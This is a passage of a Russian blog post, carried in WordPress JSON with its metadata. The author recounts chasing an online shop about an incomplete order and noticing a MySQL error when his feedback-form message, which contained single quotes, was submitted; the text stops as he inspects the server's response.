\u0445\u0432\u0430\u0442\u0430\u0435\u0442 \u0432 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0435, \u0441\u0443\u0434\u044f \u043f\u043e \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f\u043c \u0438\u0437 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u0430 \u0438 \u0437\u0434\u0440\u0430\u0432\u043e\u043c\u0443 \u0441\u043c\u044b\u0441\u043b\u0443. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0437\u0430 \u043f\u0435\u0440\u0432\u044b\u043c \u043f\u0438\u0441\u044c\u043c\u043e\u043c \u043e \u043d\u0435\u0434\u043e\u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0442\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u043e \u0432\u0442\u043e\u0440\u043e\u0435, \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u043e\u0431\u0448\u0438\u0440\u043d\u043e\u0435, \u0430 \u0441\u0431\u043e\u0440\u043a\u0430 \u043e\u0442\u043b\u043e\u0436\u0435\u043d\u0430.
  \u041a\u043e\u0433\u0434\u0430 \u043f\u0440\u043e\u0448\u043b\u0430 \u0432\u0442\u043e\u0440\u0430\u044f \u043d\u0435\u0434\u0435\u043b\u044f \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, \u043c\u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0443\u0431\u0435\u0434\u0438\u0442\u044c \u0441\u0435\u0431\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0434\u0435\u0432\u0443\u0448\u043a\u0430-\u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u0432\u044b\u0448\u043b\u0430 \u0432 \u043e\u0442\u043f\u0443\u0441\u043a. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043f\u0435\u0440\u0435\u0441\u043b\u0430\u043b \u0435\u0439 \u043f\u0438\u0441\u044c\u043c\u043e \u0434\u0432\u0443\u0445\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u043e\u0439 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438 \u0435\u0449\u0451 \u0440\u0430\u0437 \u0438 \u043f\u0435\u0440\u0435\u0448\u0451\u043b \u043a \u043f\u043e\u0438\u0441\u043a\u0443 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u0430\u043d\u0430\u043b\u043e\u0432 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u2014 \u043e\u0447\u0435\u043d\u044c \u0443\u0436 \u043d\u0435 \u0445\u043e\u0442\u0435\u043b\u043e\u0441\u044c \u0437\u0432\u043e\u043d\u0438\u0442\u044c \u0432 \u041c\u043e\u0441\u043a\u0432\u0443. \u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0442\u043e\u0436\u0435 \u0441\u0430\u043c\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u043d\u0430 \u043e\u0431\u0449\u0438\u0439 \u044d\u043b-\u0430\u0434\u0440\u0435\u0441 A@B.ru, \u043d\u0430 \u0447\u0442\u043e \u0431\u044b\u043b \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u044b\u0439 \u043e\u0442\u0432\u0435\u0442: \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u043e\u0442\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u043f\u0438\u0441\u044c\u043c\u043e \u0438\u0437-\u0437\u0430 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u043e\u0433\u043e \u044f\u0449\u0438\u043a\u0430 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u044f <\u043c\u0443\u0436\u0438\u043a>@B.ru. \u0422\u043e\u0433\u0434\u0430 \u0431\u044b\u043b\u0430 \u043d\u0430\u0439\u0434\u0435\u043d\u0430 \u0444\u043e\u0440\u043c\u0430 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u2014 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u043d\u0438\u0442\u043e\u0447\u043a\u0430 \u0441\u043e\u0435\u0434\u0438\u043d\u044f\u044e\u0449\u0430\u044f \u043c\u0435\u043d\u044f \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0441 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u043c. \u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u044f \u043e\u043f\u0438\u0441\u0430\u043b \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u0433\u043e \u044f\u0449\u0438\u043a\u0430 \u0438 \u0432\u0441\u0442\u0430\u0432\u0438\u043b \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043e\u0431 \u043e\u0442\u043a\u0430\u0437\u0435 \u0434\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043f\u0438\u0441\u044c\u043c\u043e, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u043e \u0432 \u0441\u0435\u0431\u0435 \u043e\u0434\u0438\u043d\u0430\u0440\u043d\u044b\u0435 \u043a\u0430\u0432\u044b\u0447\u043a\u0438\u2026  <\/div>\n<\/div>\n
  \u041d\u0430\u0447\u0430\u043b\u043e<\/b><\/p>\n
  \u041d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043e\u0442\u0447\u0451\u0442 \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0447\u0435\u0440\u0435\u0437 \u0444\u043e\u0440\u043c\u0443 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438, \u043d\u0430 \u043f\u0430\u0440\u0443 \u0441\u0435\u043a\u0443\u043d\u0434 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u043e\u0448\u0438\u0431\u043a\u0430, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0443\u0433\u0430\u0434\u044b\u0432\u0430\u043b\u0441\u044f \u0433\u043e\u043b\u043e\u0441 MySQL. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043e\u0442\u043a\u0440\u044b\u043b \u043a\u043e\u043d\u0441\u043e\u043b\u044c \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u043b \u0437\u0430\u043f\u0440\u043e\u0441 \u0438 \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u043b \u0432 \u043e\u0442\u0432\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u0430:  <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-264171","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/264171","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=264171"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/264171\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=264171"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=264171"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=264171"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}